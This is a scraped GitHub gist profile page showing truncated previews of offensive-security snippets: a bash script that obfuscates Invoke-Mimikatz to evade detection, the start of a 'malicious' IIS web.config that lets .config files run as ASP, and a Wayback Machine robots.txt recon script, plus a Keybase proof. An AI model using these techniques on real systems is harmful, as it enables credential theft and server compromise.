Skip to content

Instantly share code, notes, and snippets.

View gazcbm's full-sized avatar

GAZCBM gazcbm

  • Manchester, United Kingdom
View GitHub Profile
#!/bin/bash
if [[ $# -le 1 ]] ; then
echo './obfuscate-mimikatz.sh Invoke-Mimikatz.ps1 newfile.ps1'
exit 1
fi
randstr(){< /dev/urandom tr -dc a-zA-Z0-9 | head -c${1:-8};}
cp $1 $2
@gazcbm
gazcbm / downloader web.config
Created July 11, 2018 23:00
Malicious web.config's
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
import requests
import re
import sys
from multiprocessing.dummy import Pool
def robots(host):
r = requests.get(
'https://web.archive.org/cdx/search/cdx\
?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host)

Keybase proof

I hereby claim:

  • I am gazcbm on github.
  • I am garethdarby (https://keybase.io/garethdarby) on keybase.
  • I have a public key whose fingerprint is 5D0A 6220 3D3B BA5B FFBE 8B2F 6912 F86D E874 BC41

To claim this, I am signing this object: